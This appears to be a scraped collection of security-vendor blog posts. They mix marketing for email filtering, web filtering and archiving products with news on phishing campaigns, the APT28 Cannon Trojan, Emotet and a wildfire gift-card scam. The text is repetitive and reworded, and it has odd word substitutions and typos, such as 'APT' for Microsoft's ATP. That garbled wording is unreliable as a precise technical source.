WebTitan Cloud for WiFi allows companies to carefully control the content that can be accessed over WiFi without involuntarily blocking unintended content. Being 100% cloud based, no hardware purchases have to be completed and no software downloads are necessary.

The solution offers companies advanced web filtering capabilities through an easy to use intuitive user interface. No IT consultants are needed to implement and run the solution. It can be set up and managed by individuals that have little to no technical knowhow.

The solution is highly scalable and can be used to safeguard thousands of users, at multiple locations around the globe, all managed through a single user interface.

If you run a company that offers free WiFi to customers and you have not yet started controlling the activities that can take place over your WiFi network, contact TitanHQ today for further information on WebTitan Cloud for WiFi.

Managed Service Providers (MSPs) that want to start providing WiFi filtering to their clients can join the TitanHQ Alliance. All TitanHQ solutions have been created to meet the needs of MSPs and make it simple for them to add new security capabilities to their service stacks.

Office 365 Phishing Emails Masquerade as Non-Delivery Notifications

A phishing campaign was recently discovered by ISC Handler Xavier Mertens and it seems as though the campaign is still  active.

The phishing emails look like legitimate Office 365 non-delivery notifications and include Office 365 branding. As is the case with official non-delivery alerts, the user is warned hat messages have not been delivered and told that action must be taken.

The Office 365 phishing emails claim that “Microsoft found Several Undelivered Messages” and attributes the non-delivery to “Server Congestion.” The emails direct the sender to retype the recipient’s email address and share the message again, although conveniently they have a Send Again button.

If users use the Send Again button, they will be directed to a website that closely looks like official Office 365 website and includes a login box that has been pre-filled-out with the user’s email address.

If the password is handed over, a JavaScript function sends both the email address and password to the hacker. The user will then be sent to the actual outlook.office365.com website where they will be shown a real Office 365 login box.

While the Office 365 phishing emails and the website look genuine, there are signs that all is not what it seems. The emails are well composed and the sender’s email – postmaster@us.ibm.com – looks official but there is irregular capitalization of the warning alert: Something that would not be included on an official Microsoft notification.

The most obvious sign that this is a phishing scam is the domain to which users are directed if they click on the Send Again button. It is not an authentic Microsoft domain (agilones.com).

While the mistake in the email may be missed, users should notice the domain, although some users may proceed and enter passwords as the login box is the exact same as the login on the official Microsoft site.

The campaign shows just how vital it is to carefully check every message before taking any action and to always review the domain before disclosing any sensitive data.

Hackers use Office 365 phishing emails because so many companies have signed up to use Office 365. Mass email campaigns therefore have a high probability of reaching an Outlook inbox. Even so, it is easy to target office 365 users. A business that is using Office 365 broadcasts it through their public DNS MX records.

Companies can bolster their resilience to phishing attacks through mandatory security awareness training for all staff. Employees should be told to always review messages carefully and should be taught how to spot phishing emails.

Companies should also make sure they have an advanced spam filtering solution implemented. While Microsoft does provide anti-phishing protection for Office 365 via its Advanced Threat Protection (APT) offering, businesses should think about using a third-party spam filtering solution with Office 365.

SpamTitan supplies protection against phishing and zero-day attacks, an area where APT experiences difficulty.

Lion Air Spear Phishing Campaign Spreading Cannon Trojan

A new malware variant,labelled the Cannon Trojan, is being implemented in targeted attacks on government agencies in the United States and Europe. This malware threat has been strongly connected to a threat group known under many names – APT28, Fancy Bear, Sofacy, Sednet, Strontium – that has connections  to the Russian government.

The Cannon Trojan is being used to collate data on potential targets, collecting system information and capturing screenshots that are sent back to APT28. The Cannon Trojan is also an installer capable of installing further malware variants onto an impacted system.

This recently-detected malware threat is stealthy and uses a mix of tricks to prevent detection and hide communications with its C2. Rather than communicating over HTTP/HTTPS, like other malware variants used by APT28, the Cannon Trojan communicates through email over SMTPs and POP3S.

Once downloaded, an email is shared over SMTPS through port 465 and an additional two email addresses are obtained through which the malware sends with its C2 using the POP3S protocol to receive instructions and send back data. While the use of email for communicating with a C2 has been seen previously, it is relatively unusual. One benefit offered by this method of communication is it is more difficult to identify and block that HTTP/HTTPS.

The Cannon Trojan, like the Zebrocy Trojan which is also being implementing using APT28, is being shared through spear phishing emails. Two email templates have been intercepted by Palo Alto Networks’ Unit 42 team, one of which takes advantage of interest in news about the Lion Air plane crash in Indonesia.

The Lion Air spear phishing campaign looks like it is providing updates on the victims of the crash, which the email claims are detailed in an attached Word document titled Crash List (Lion Air Boeing 737).docx. The user must Enable Content to see the contents of the document. It is claimed that the document was set up in an earlier version of Word and content must be turned on for the file to be displayed. Opening the email and enabling content would let the macro run, which would then silently install the Cannon Trojan.

Instead of the macro running and installing the payload straightaway, as an anti-analysis mechanism, the hackers use the Windows AutoClose tool to delete completion of the macro routine until the document is closed. Only then is the Trojan installed. Any sandbox that reviews the document and exits before closing the document would be unlikely to see it as malicious. In addition, the macro will only run if a link with the C2 is created. Even if the document is opened and content is allowed, the macro will not run without its C2 channel open.

The methods used by the hackers to obfuscate the macro and hide communications make this threat difficult to spot. The key to spotting infection is blocking the threat at source and stopping it from reaching inboxes. The provision of end user assistance to allow employees identify threats such as emails with attachments from unknown senders is also crucial.

Germany Cybercrime Losses Estimated to be €43 Billion

With the world’s largest economy, the United States is naturally a major focus for cybercriminals. Various studies have been carried out in relation to the cost of cybercrime in the United States, but little data has been made available on cybercrime losses in Germany – Europe’s largest economy.

The International Monetary Fund releases a list of countries with the largest economies. In 2017, Germany came in fourth place after the United States, China, and Japan. Its GDP of $3,68 trillion accounts for 4.61% of global GDP.

A recently released study carried out by Germany’s federal association for Information Technology – BitKom – has placed a figure on the toll that cybercrime is having on the German economy.

The study targeted on security chiefs and managers at Germany’s top 503 companies in the manufacturing sector. Based on the results of that survey, BitKom calculated cybercrime losses in Germany to be €43 billion ($50.2 billion). That accounts for 1.36% of the country’s GDP.

Extrapolate those cybercrime figures in Germany and it places the global cost of cybercrime at $1 trillion, substantially higher than the $600 billion figure estimate from cybersecurity company McAfee and the Center for Strategic and International Studies (CSIS) in February 2018. That study estimated the global percentage of GDP lost to cybercrime at between 0.59% and 0.80%, with GDP losses to cybercrime across Europe calculated to be between 0.79 to 0.89% of GDP.

Small to Medium Sized Businesses Most in Danger

While cyberattacks on large enterprises can be highly profitable for cybercriminals, those firms tend to have the resources available to spend heavily in cybersecurity. Attacks on large enterprises are therefore much more difficult and time consuming. It is far simpler to focus on smaller companies with less robust cybersecurity defenses.

Small to medium sized businesses (SMBs) often do not have the resources to spend heavily on cybersecurity, and consequently are far simpler to attack. The BitKom study confirmed that these firms, which form the backbone of the economy in Germany, are particularly susceptible to cyberattacks and have been extensively focused on by cybercriminals.

It is not just organized cybercriminal groups that are running these attacks. Security officials in Germany have long been concerned about attacks by well-financed foreign spy agencies. Those agencies are using cyberattacks to obtain access to the advanced manufacturing techniques created by German firms that give them a competitive advantage. Germany is one of the world’s main manufacturing nations, so it stands to reason that the German firms are an attractive target.

Cybercriminals are stealing money from German firms and selling stolen data on the black market and nation-state backed hackers are stealing proprietary data and technology to assist manufacturing in their own countries. According to the survey, one third of companies have had mobile phones stolen and sensitive digital data has gone missing from a quarter of German firms. 11% of German firms report that their communications systems have been tapped.

Attacks are also being used to sabotage German firms. According to the study, almost one in five German firms (19%) have had their IT and production systems infiltrated and impacted through cyberattacks.

Companies Must Enhance Their Defenses Against Cyberattacks

Achim Berg, head of BitKom recently stated: “With its worldwide market leaders, German industry is particularly interesting for criminals”. Companies, SMBs especially, must take cybersecurity much more seriously and invest commensurately in cybersecurity solutions to stop cybercriminals from gaining access to their systems and data.

Thomas Haldenweg, deputy president of the BfV domestic intelligence agency stated: “Illegal knowledge and technology transfer … is a mass phenomenon.”

Stopping cyberattacks is not easy. There is no onee solution that can safeguard against all attacks. Only defense-in-depth will see to it that cybercriminals and nation-state sponsored hacking groups are stopped from obtaining access to sensitive data.

Companies need to carry out regular, in-depth organization-wide risk analyses to identify all threats to the confidentiality, integrity, and availability of their data and systems. All identified dangers must then be addressed through a robust risk management process and layered defenses put in place to thwart attackers.

One of the chief vectors for attack is email. Figures from Cofense indicate that 91% of all cyberattacks begin with a malicious email. It stands to reason that enhancing email security should be a key priority for German firms. This is an area where TitanHQ can be of assistance.

TitanHQ is a supplier of world-class cybersecurity solutions for SMBs and enterprises that obstruct the most commonly used attack vectors. To discover more about how TitanHQ’s cybersecurity solutions can help to enhance the security posture of your company and block email and web-based attacks, contact the TitanHQ sales team now.

Windows Components Used to Install Banking Trojans in New Office 365 Threat

The attack begins with malspam including a dangerous link embedded in an email. A range of different themes could be used to entice users into clicking the link, although one of the latest campaigns pretends to be emails from the national postal service in Brazil.

The emails claim the postal service tried to send a package, but the delivery failed as there was no one at home. The tracking code for the package is sent in the email and the user is requested to click the link in the email to receive the tracking data.

In this instance, visiting the link will result in a popup asking the user to confirm the install the zip file, which it is alleged includes the tracking data. If the zip file is downloaded, the user is asked to click on a LNK file to receive the data. The LNK file runs cmd.exe, which runs a Windows Management Instrumentation (WMI) file: wmic.exe. This legitimate Windows file will be used to communicate with the hacker’s C2 server and will create a duplicate of another Windows file – certutil.exe in the %temp% folder with the name certis.exe. A script then operates which instructs the certis.exe file to connect to a different C2 server to install malicious files.

The focus of this attack is to use authentic Windows files to install the malicious payload: A banking Trojan. The use of real Windows files for communication and downloading files helps the attackers bypass security controls and install the malicious payload unnoticed.

These Windows files can install other files for legitimate purposes, so it is hard for security teams to spot malicious activity. This campaign focuses on users in Brazil, but this Office 365 threat should be a worry for all users as other threat actors have also tried this tactic to install malware.

Due to the difficulty in differentiating between legitimate and malicious wmic.exe and certutil.exe activity, blocking an office 365 threat such as this is simplest at the initial point of attack: Preventing the malicious email from being delivered to an inbox and providing security awareness training to staff to help them identify this Office 365 threat. The latter is crucial for all businesses. Employees can be turned into a strong last line of defense through security awareness training. The former can be achieved with a spam filtering solution such as SpamTitan. SpamTitan will stop the last line of defense from being tested.

How to Prevent this Office 365 Threat with SpamTitan & Enhance Email Security

Microsoft uses many techniques to identify malspam and stop malicious messages from reaching users’ inboxes; however, while efforts have been made to enhance the effectiveness of the spam filtering controls of Office 365, many malicious messages are still sent.

To enhance Office 365 security, a third-party spam filtering solution should be deployed. SpamTitan has been created to allow simple integration into Office 365 and provides superior protection against a wide variety of email threats.

SpamTitan uses different methods to stop malspam from being sent to end users’ inboxes, including predictive techniques to spot threats that are misidentified by Office 365 security controls. These techniques ensure industry-leading catch rates in excess of 99.9% and stop malicious emails from reaching inboxes.

How SpamTitan Spam Filtering Works

How SpamTitan Secure Companies from Email Threats

Security Solutions for MSPs to Prevent Office 365 Threats

Many MSPs resell Office 365 licenses to their clients. Office 365 permits MSPs to capture new business, but the margins are tiny. By offering extra services to improve Office 365 security, MSPs can make their Office 365 offering more desirable to businesses while growing the profitability of Office 365.

TitanHQ has been creating innovative email and web security solutions for over 25 years. Those solutions have been created from the foundations up with MSPs for MSPs. Three solutions are ideal for use with Office 365 for compliance ad to enhance security – SpamTitan email filtering, WebTitan web filtering, and ArcTitan email archiving.

By including these solutions into Office 365 packages, MSPs can supply clients with much greater value as well as majorly improving the profitability of offering Office 365.

To discover more about each of these solutions, speak to TitanHQ. The MSP team will outline how the products operate, how they can be adapted to your company, and how they can boost margins on Office 365.

ArcTitan Offers Lightning-Fast, Enterprise-Class Microsoft Exchange Email Archiving for your Business

Is your business looking for a lightning-fast, enterprise-class method of email archiving? Nowadays, it is a requirement in business to have an email archiving solution in order to ensure that emails are not lost, emails can be retrieved on demand and storage space is kept to a minimum. Although native Microsoft Exchange Email Archiving is already available, most businesses will find the archiving options are not up to standard. The only alternative is to adopt a third-party email archiving solution. This will provide all the features required by businesses, as well improve efficiency and save on cost. In order to improve efficiency and meet the requirements of businesses, TitanHQ developed ArcTitan: A secure, fast, cloud-based email archiving solution.

What Email Archiving is and its Importance

Businesses have been required by federal, state, and industry regulations to retain emails for many years. Often a considerable amount of storage space is taken up through storing emails, especially when you consider the number of emails that are typically sent and received by employees daily. Although it suffices for businesses to store emails in backups to meet legal requirements, backups are not searchable. When a business needs to recover a certain email, it needs to be recovered quickly. This is simply not possible with backups, they are not searchable. The solution to this problem is an email archive. In comparison to backups, email archives are searchable and messages can be retrieved quickly and with minimal effort.

Email Archiving Necessary for eDiscovery and GDPR Compliance

An email archiving solutions for eDiscovery is essential. There have been a number of cases where, as part of the eDiscovery process, businesses have received heavy fines for the failure to produce emails. An example of this can be seen in the Zubulake v. USB Warburg case where the plaintiff was awarded $29 million as a result of the failure to produce emails.

In order to comply with GDPR legislation, email archives are now vital. Since May 25, 2018, when the EU’s General Data Protection Regulation came into effect, companies have been required on request to produce (and delete) every element of an individual’s personal data, including personal data contained in emails. This can be incredibly time consuming without an email archive and may result in data being unlawfully retained since backups are not searchable. The fines for GDPR compliance failures can reach as high as €20 million or 4% of global annual revenue, whichever is more substantial.

Native Microsoft Exchange Email Archiving Drawbacks

Native Microsoft exchange email archiving provides businesses with journaling and personal archive functions, but there are drawbacks to each. While the functions meet some business requirements such as freeing up space in mailboxes, they lack the full functions of a dedicated archive and do not meet all eDiscovery requirements.

When using native Microsoft Exchange email archiving, end users have too much control over the information that is loaded into an archive and they can’t delete emails unless a legal hold is activated. For admins, retrieving emails can be complicated and extremely time consuming.

With native Microsoft Exchange email archiving, functions fail to meet the needs of a lot of businesses particularly those in highly regulated industries. Although the native Microsoft Exchange email archiving functions have improved over the years, the limitations remain with most product versions and archiving can be complex with certain email architectures.

Any business that uses multiple email systems alongside Microsoft Exchange will require a third-party email archiving solution. This is due to Microsoft Exchange not supporting the archiving of emails from other platforms.

There has been an improvement in email archiving with Office 365. SMBs that use Office 365 already have email archiving functionality included in their plans, but it is only free of charge with E3-E5 plans. Additional plans charge around $3 per user, which is more expensive than custom-built archiving solutions such as ArcTitan.

Native Microsoft Exchange email archiving is an option for businesses, but Microsoft Exchange was not developed specifically for email archiving. However, despite the improvements that have been made by Microsoft, a third-party solution for email archiving on Microsoft Exchange is still required.

A third-party email archiving solution will make managing your email archiving significantly more efficient. It will save your IT department a considerable amount of time trying to locate old messages, especially for the typical requests that are received which are light on detail. The advanced search options in ArcTitan make search and retrieval of messages much faster and easier.

ArcTitan: Lightning-Fast, Enterprise-Class Email Archiving

ArcTitan has been specifically developed for email archiving making it more specialised than competitors. ArcTitan has been designed to meet all the archiving needs of businesses and allow managed service providers to offer email archiving to their clients.

The benefits of ArcTitan include extremely fast email archiving and message retrieval, secure encrypted storage and compliance with industry regulations such as HIPAA, SOX, FINRA, SEC and GDPR. ArcTitan allows businesses meet eDiscovery requirements without having to pay for additional eDiscovery services from Microsoft. ArcTitan also maintains an accurate audit trail. This allows businesses to have near instant access to all of their emails. ArcTitan serves as a black box recorder for all email to meet the various eDiscovery requirements and ensures compliance with federal, state, and industry regulations.

ArcTitan Features

ArcTitan requires no hardware or software, is quick and easy to install, and slots in to the email architecture of businesses with ease. The solution is highly scalable (there are no limits on storage space or users), it is easy to use, lightning fast and stores all emails safely and securely.

Businesses that have not yet implemented a Microsoft Exchange email archiving solution typically save up to 75% storage space. Costs are also kept to a minimum with a flexible pay as you go pricing policy, with subscriptions paid per live user.

  • Unlimited cloud based email archiving including inbound/outbound/internal email, folders, calendars and contacts
  • A full data retention and eDiscovery policy
  • HIPPA, SOX (and more) standard compliance and audited access trail
  • SuperFast Search™ – email is compressed, zipped, uses message de-duplication and attachment de-duplication ensuring the fast search and retrieval
  • Web console access with multi-tiered and granular access options – You decide user access permissions
  • No hardware / software installation required
  • Works with all email servers including MS Exchange, Zimbra, Notes, SMTP/IMAP/Google/PO
  • Secure transfer from your email server
  • Encrypted storage on AWS cloud
  • Instantly searchable via your browser – You can find archived emails in seconds
  • Maintains a complete audit trail
  • Optional Active Directory integration for seamless Microsoft Windows authentication
  • Optional Outlook email client plugin

If you have not yet implemented an email archiving solution, if you are unhappy with the native Microsoft Exchange email archiving features, or if you are finding your current archiving solution too expensive or difficult to use, contact TitanHQ today to find out more about the benefits of ArcTitan and the improvements it can offer to your business.

California Wildfire Scam Email Warning Issued

A California wildfire scam is underway that asks for donations to help those impacted by the recent wildfires. The emails seem to come from the CEO of a company and are aimed at its staff members in the accounts and finance sections.

It should come as no shock that hackers are taking advantage of yet another natural disaster and are trying to con people into giving donations. Scammers often move swiftly following natural disasters to pull on the emotions and defraud businesses. Similar scams were carried out in the wake of the recent hurricanes that hit the United States and caused widespread harm.

The California wildfire scam, discovered by Agari, is a business email compromise (BEC) attack. The emails seem to have been sent by the CEO of a company, with his/her email address used to transmit messages to company staff. This is often accomplished by spoofing the email address although in some instances the CEO’s email account has been compromised and is used to broadcast the messages.

The California wildfire scam includes one major red flag. Rather than ask for a monetary donation, the scammers request money in the form of Google play gift cards. The messages ask for the redemption codes to be sent back to the CEO by reply.

The emails are sent to staff members in the accounts and finance departments and the emails ask that the money be donated in 4 x $500 denomination gift cards. If these are returned to the CEO, he/she will then forward them on to company clients that have been impacted by the California wildfires.

The reason Google play gift cards are asked for is they can easily be exchanged on darknet forums for other currencies. The gift cards are almost impossible to trace back to the hacker.

The messages include lots of grammatical errors and incorrect spellings. Even so, it is another indication that the messages are not authentic. However, scams like this are sent because they are successful. Many people have been tricked by similar scams previously.

Safeguarding against scams like this requires a combination of technical controls, end user training and company policies. An advanced spam filtering solution should be be put in place – SpamTitan for instance – to stop messages such as these from arriving in inboxes. SpamTitan checks all incoming emails for spam signatures and uses complex techniques such as heuristics, machine learning and Bayesian analysis to spot advanced and never-before-seen phishing campaigns.

End user training is vital for all staff, especially those with access to corporate bank accounts. Those workers are usually targeted by scammers. Policies should be put in place that require all requests for changes to bank accounts, unusual payment requests, and wire transfers above a certain threshold to be confirmed by phone or in person before they are given approval.

A combination of these tactics will help to secure businesses from BEC attacks and other email scams.

California Wildfire Scam Warning

A California wildfire scam is doing the rounds that asks for donations to be made in order to help the victims of the recent wildfires. The emails look like that have been sent from the CEO of a company and are aimed at its employees in the accounts and finance sections.

It will be no shock to learn that cybercriminals are taking advantage of a natural disaster and are attempting to trick people into giving donations. Cybercriminals often take advantage of natural disasters to pull on the heart strings and defraud companies. Scams like this were conducted in the wake of the recent hurricanes that hit the United States and caused a lot of damage.

The California wildfire scam, first discovered by Agari, is a form of business email compromise (BEC) attack. The emails are created to look like they were sent by the CEO of a company, with his/her email address used to send messages to company staff. They do this by spoofing the email address although in some cases the CEO’s email account has been compromised and is used to share the emails.

The California wildfire scam includes one big warning sign. Rather than asking for a monetary donation, the scammers request money to be donated using Google play gift cards. The messages request the redemption codes be returned to the CEO by return.

The emails are sent to staff in the accounts and finance departments and the emails request that the money be donated in the form of 4 x $500 denomination gift cards. If these are sent back to the CEO, he/she will then forward them on to company clients that have been impacted by the California wildfires.

The reason Google play gift cards are requested is because they can easily be used on darknet forums for other currencies. The gift cards are practically impossible to trace back to the hacker.

The messages are full of grammatical mistakes and spelling errors. Despite this, it is another sign that the messages are not authentic. However, scams like this are sent because they are successful. Many people have been reeled in by similar scams on previous occasions.

Safeguarding against scams such as this requires technical controls, end user training and company policies. An advanced spam filtering solution should be deployed  – like SpamTitan – to stop messages such as these from reaching inboxes. SpamTitan audits all incoming emails for spam signatures and uses advanced techniques including heuristics, machine learning, and Bayesian analysis to identify advanced and previously unseen phishing attacks.

End user training is vital for all worker, especially those who can view corporate bank accounts. Those employees are often targeted by scammers. Policies should be devised that require all requests for changes to bank accounts, unusual payment requests, and wire transfers above a specific threshold to be confirmed by phone or in person before they are given the ok.

A combination of these measures will help to safeguard companies from BEC attacks and other email scams.

Spam News

Our spam news section is a collect of up to date news articles on the latest threats that are likely to hit the inboxes of your employees. Hackers are always  changing tactics with new spam email campaigns, different social engineering ploys and new methods of installing malware and ransomware. By keeping up to date on the most recent spam news, organizations can take timely action to tackle risk.

In relation to that, a spam filtering solution is crucial. All it takes is for one employee to click on a malicious link or open an infected email attachment for an entire network to be infiltrated. A spam filter will check all incoming email messages and search for typical spam signatures in addition to checking senders’ email accounts against blacklists of known hackers. Email attachments will be checked for virus signatures and hyperlinks compared to blacklists of recognized malicious domains.

Armed with the most recent spam news article, information security teams can send email alerts to their staff warning of pertinent threats that they need to know.

This section also includes news on industry-specific hacking attacks, in particular those that are being used to focus on and take advantage of the healthcare, education, financial services, legal and hospitality sectors.

Web Filtering Software for Schools

Although the aims of the Children´s Internet Protection Act (CIPA) – and later state legislation relating to web filters for schools – were undoubtedly well-intentioned, some educational institutions have been reluctant to adapt school web filtering software.

Some of the reasons for this reluctance are logical. Over-zealous web filters for schools can stop students from accessing educational material and teenage support groups, while students from lower-income families without home Internet can be hindered by “digital deprivation” in an over-filtered environment.

It is sometimes the case that school web filtering software is responsible for an over-filtered environment. Depending on the extent of the software, it may have a high maintenance overhead or lack the versatility to account for students of different ages studying a wide range of topics.

In these instances, it is easier for system managers to apply the maximum security settings to ensure compliance with federal and state laws. This is when the issues are seen. Now, there is a solution from SpamTitan that can resolve these issues quickly and simply – WebTitan Cloud.

WebTitan Cloud is cloud-based school web filtering software that is quick to put in place and easy to configure. Being a cloud-based solution, there is no hardware to buy or software to be installed – so no technical skills are required and there are no upfront costs to consider.

Once active, WebTitan Cloud uses a three-tier mechanism to review each request to visit a website against its filtering parameters, providing the level of granularly web filters for schools should have in order to be effective in a multi-age, multi-cultural environment.

The filtering parameters can be created according to age, by user, by class, or by year – and password protected – to ensure each student is able to access the educational and age-appropriate material they need to become digitally literate and in order to be able to seek help from support groups if needed.

Along with its versatility, WebTitan Cloud provides a safe barrier against online content prohibited by CIPA and protects networks and users´ devices against malware, adware, spyware and ransomware. Our school web filtering software also has security measures to prevent students trying circumnavigate the filtering parameters. With WebTitan Cloud schools can:

  • Restrict access to VPNs and proxy websites.
  • Set up multilingual filter settings.
  • Stop access to cached website pages.
  • Filter out numerical IP addresses.

For schools that supply a wireless network for students, WebTitan Cloud for WiFi is equally as versatile and safe. Our school web filtering software for wireless networks allows schools to manage the content students can access from their mobile devices, and supplies a deep analysis of network activity – right down to the online activity of each individual user.

In states where parents have the right to state the level of Internet access their children can have at school, the versatility of WebTitan Cloud for WiFi prevents the scenario in which every child has to adhere to the wishes of the strictest parent. The detailed level of oversight also helps to identify students who may be using the Internet inappropriately and who are then vulnerable to online attacks.

Our WiFi web filters for schools can be deployed to filter Internet content from a single hotspots or multiple hotspots. It safeguards users´ devices as well as the school´s network without affecting the speed at which web content is sent. They also have a very useful bandwidth-restricting function that can stops students consuming a school´s bandwidth by streaming sports, films and music videos.

Our school web filtering software for both fixed networks and wireless networks has been created to be effective against online threats, compliant with federal and states laws, easy to use and sufficient versatile to resolve issues about stopping students from accessing educational material and teenage support groups. Now we ask you to test our web filters for schools for free.

If your school has been reluctant to put in place school web filtering software due to worries regarding an over-filtered environment, we invite you to contact us and discuss your concerns. Our team of Sales Technicians will reply to any questions you have about web filters for schools and invite you to have a free trial of WebTitan Cloud or WebTitan Cloud for WiFi – whichever is the most proper solution for your specific circumstances.

There are no set up expenses to address, no credit cards are required and there are no contracts to complete order to take advantage of our offer. Our free trial is intended to give you the chance to evaluate the merits of school web filtering in your own environment and there is no obligation on you to go on using our service once the free trial has ended. Call us now and your school could be safeguarding your students from online dangers and inappropriate content within 15 minutes.

MSPs Email Archiving: A Simple Way to Win Business & Increase Email Revenue

Email archiving for MSPs is an often-disregarded service that can add value and enhance profits. Email archiving is simple to implement and control, has a high margin, generates regular extra income, and is a simple sell to clients.

In this post we look into the advantages for clients and MSPs and explain why email archiving for MSPs and their clients is a win-win.

Advantages of Email Archiving for SMBs

Email archiving is now crucial for organizations of all sizes, from SMBs to the largest enterprises. Huge amounts of emails are sent and received on a daily basis and duplicates of those emails need to be stored, saved, and often retrieved.  Storage of emails in mailboxes poses issues. The storage space necessary for emails and attachments can be considerable, which means hardware must be purchased and maintained. In terms of security, storing large amounts of emails in mailboxes is never wise.

Storing emails in backups is a solution, although it is far from ideal.  Space is still necessary and recovering emails when they are needed is a major issue as backup files are not indexed and searching for messages can be extremely time consuming.

An email archive on the other hand is indexed and searchable and emails can be quickly and easily rescued on demand. If there is a legal argument or when a group needs to demonstrate compliance – with GDPR or HIPAA for example – companies need to be able to recover emails quickly and easily. An email archive also puts in place a clear chain of custody, which is also necessary for compliance with many regulations.

Cloud-based archives offer secure storage for emails with no limits on storage space. Cloud storage is highly scalable and emails can be easily retrieved from any area.

In short, email archiving can enhance efficiency, enhance security, lower expenses, and is an invaluable compliance tool.

Advantages of Email Archiving for MSPs

Given the advantages of email archiving it should be an easy sell for MSPs, either as Office 365 archiving-as-a-service as an add-on or incorporated into current email packages to offer greater value and make your packages stand out from those of your competitors.

As an add-on service, Office 365 archiving-as-a-service will lead to regular income for very little effort and will improve the meagre returns from simply offering Office 365 to your clients. As part of a package it can help you to winning more business.

ArcTitan –Email Archiving for MSPs the Easy Way

TitanHQ is a main provider of cloud-based security solutions for MSPs. All TitanHQ products – SpamTitan, WebTitan and ArcTitan SaaS email archiving – have been created from the group up to specifically meet the requirements of MSPs.

ArcTitan has been created to be easy to adapt and manage and it seamlessly integrates into MSPs service stacks, allowing them to supply increased value to clients and make email services much more lucrative offering. On that front, TitanHQ is able to offer generous profits on ArcTitan for MSPs.

ArcTitan Advantages for MSPs

  • Easy to adapt
  • No hardware necessary
  • No software installation required
  • Very scalable email archiving
  • Safe, cloud-based storage with a simple to use centralized management system
  • Enhances profitability of Office 365
  • Simple for MSPs to set up
  • Straight forward for clients to use
  • Great profits for MSPs
  • Available with a full suite of APIs for easy integration
  • Usage-based pricing and monthly invoices
  • Multiple hosting solutions: TitanHQ Cloud, dedicated private cloud, or host the solution in your own data center
  • Completely rebrandable – ArcTitan can be supplied in white-label form ready for your own branding
  • Top class customer service and support

If you have yet to begin providing email archiving to your clients or if you are unhappy with your current supplier, get in touch with the TitanHQ MSP team today for full ArcTitan product information, details of pricing, and further information on our Alliance program.

 

Emotet Malware Being Spread Using Thanksgiving Themed Spam Emails

There has been a rise in malspam campaigns spreading Emotet malware in recent times, with many new campaigns initiated that spoof financial institutions – the modus operandi of the threat group behind the attacks.

The Emotet malware campaigns use Word documents including malicious macros. If macros are turned on, the Emotet malware payload is installed. The Word documents are either sent as email attachments or the spam emails contain hyperlinks which direct users to a website where the Word document is installed.

Various social engineering tricks have been used in these recent campaigns. One new tactic that was spotted by Cofense is the wrapping of malicious hyperlinks in Proofpoint’s (PFPT) TAP URL Defense wrapping service to make the email seem benign.

According to Cofense, the campaign shares Emotet malware, although Emotet in turn installs a secondary payload. In past campaigns, Emotet has been sent along with ransomware. First, Emotet steals details, then the ransomware is used to steal money from victims. In the most recent campaign, the secondary malware is the banking Trojan named IcedID.

A additional campaign has been seen that uses Thanksgiving-themed spam emails. The messages seem to be Thanksgiving greetings for employees, and similarly include a malicious hyperlink or document. The messages claim the document is a Thanksgiving card or greeting. Many of the emails have been personalized to help with the deception and include the user’s name. In this campaign, while the document downloaded seems to be a Word file, it is actually an XML file.

A new version of Emotet malware has been updated recently. Along with stealing credentials, a new module has been added that harvests emails from an infected user. The previous six months’ emails – which include subjects, senders, and message content – are illegally taken. This new module is thought to have been added to enchance the effectiveness of future phishing campaigns, for corporate espionage, and data theft.

The latest increase in Emotet malware campaigns, and the wide variety tactics used by the threat actors behind these campaigns, highlight the importance of implementing a defense in depth strategy to block phishing emails. Organizations should not rely on one cybersecurity solution to provide security against email attacks.

Phishing campaigns aim for a weak link in security defenses: Staff members. It is therefore vitaal to ensure that all employees with corporate email accounts are taught how to spot phishing threats. Training needs to be constant and should cover the latest tactics used by cybercriminals to spread malware and steal details. Staff are the last line of defense. Through security awareness training, the defensive line can be greatly strengthened.

As a frontline defense, all businesses and groups should deploy an advanced spam filtering solution. While Office 365 email includes a basic level of protection against phishing attacks, a powerful third-party anti-phishing and spam filtering solution is needed to provide protection against more complex email attacks.

SpamTitan is an advanced email filtering solution that employs predictive techniques to supply provide superior protection against phishing attacks, zero-day attacks, and new malware variants that bypass signature-based defenses.

Along with scanning message content, headers, attachments, and hyperlinks for spam and malware signatures, SpamTitan uses heuristics, machine-based learning, and Bayesian analysis to discover emerging threats. Greylisting is used to identify and block bigger spam campaigns, such as those typically carried out by the threat actors spreading banking Trojans and Emotet malware.

How SpamTitan Spam Filtering Works

 

Lion Air Spear Phishing Campaign Shares Stealthy Cannon Trojan

A newly created malware variant, callede Cannon Trojan, is being used in focused attacks on government agencies in the United States and Europe. The new malware threat has been connected to a threat group known under many titles – APT28, Fancy Bear, Sofacy, Sednet, Strontium – that has links to the Russian government.

The Cannon Trojan is being used to gather data on potential targets, collatting system information and capturing screenshots that are sent back to APT28. The Cannon Trojan is also an installer capable of loading further malware variants onto a compromised system.

The new malware threat is stealthy and uses a range of tricks to avoid detection and hide communications with its C2. Rather than communicating over HTTP/HTTPS, like other malware variants used by APT28, the Cannon Trojan communicates through email over SMTPs and POP3S.

Once downloaded, an email is shared through SMTPS through port 465 and another two email addresses are obtained through which the malware communicates with its C2 using the POP3S protocol to receive instructions and share back data. While the use of email for communicating with a C2 is not unknown, it is relatively unusual. One advantage provided by this method of communication is it is more difficult to spot and block that HTTP/HTTPS.

The Cannon Trojan, like the Zebrocy Trojan which is also being used by APT28, is being shared via spear phishing emails. Two email templates have been captured by Palo Alto Networks’ Unit 42 team, one of which takes advantage of interest in the Lion Air plane crash in Indonesia.

The Lion Air spear phishing campaign seems to provide data on the victims of the crash, which the email claims are listed in an attached Word document titled Crash List (Lion Air Boeing 737).docx. The user must Enable Content to see the contents of the document. It is alleged that the document was created in an earlier version of Word and content must be turned on for the file to be displayed. Opening the email and enabling content would trigger the macro to run, which would then silently install the Cannon Trojan.

Instead of the macro running and downloading the payload immediately, as an anti-analysis mechanism, the hackers use the Windows AutoClose tool to slow the completion of the macro routine until the document is shut. Only then is the Trojan installed. Any sandbox that analyzes the document and exits before closing the document would be unlikely to view it as malicious. Further, the macro will only run if a link with the C2 is established. Even if the document is opened and content is enabled, the macro will not run without its C2 channel open.

The techniques employed by the hackers to obfuscate the macro and hide communications make this threat difficult to spott. The key to stopping infection is blocking the threat at source and preventing it from arriving at inboxes. The provision of end user training to assist employees identify threats such as emails with attachments from unknown senders is also vital.

Banking Trojans Installed Using Windows Components in New Office 365 Threat

A new Office 365 threat has been discovered that stealthily downloads malware by masking communications and downloads by targeting legitimate Windows components.

